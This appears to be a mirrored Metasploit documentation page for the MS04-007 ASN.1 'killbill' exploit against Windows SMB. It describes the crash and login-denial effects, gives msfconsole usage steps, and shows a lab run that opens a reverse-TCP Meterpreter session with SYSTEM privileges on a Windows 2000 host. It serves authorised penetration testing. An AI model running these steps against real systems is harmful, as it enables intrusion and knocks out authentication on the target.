CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/smb/ms04_007_killbill.md
Views: 1904

Vulnerable Application

This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch.

You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system.

This exploit has been successfully tested with the windows/[all]/reverse_tcp payloads, however a few problems were encountered when using the equivalent bind payloads. Your mileage may vary.

Service Pack 1, Roll Up 1 includes MS04-007.

Verification Steps

  1. Start msfconsole

  2. Do: use modules/exploits/windows/smb/ms04_007_killbill

  3. Do: set RHOSTS [IP]

  4. Do: set LHOST [IP]

  5. Do: set LPORT [port]

  6. Do: run

Error messages

The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)

The system is vulnerable.

The server responded with error: STATUS_INVALID_PARAMETER (Command=115 WordCount=0)

The system is not vulnerable.

Scenarios

A run on Windows 2000 (Build 2195, SP4) and Kali Linux 2019.3

msf > use modules/exploits/windows/smb/ms04_007_killbill
msf exploit(windows/smb/ms04_007_killbill) > set RHOSTS 192.168.1.2
  RHOSTS => 192.168.1.2
msf exploit(windows/smb/ms04_007_killbill) > run
  [*] Started reverse TCP handler on 192.168.1.3:4444
  [-] 192.168.1.2:445 - Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
  [*] Sending stage (180291 bytes) to 192.168.1.2
  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:1050) at 2019-11-27 19:08:46 -0700

meterpreter > sysinfo
  Computer        : PC-B43791F5F5
  OS              : Windows 2000 (5.0 Build 2195).
  Architecture    : x86
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 0
  Meterpreter     : x86/windows

meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM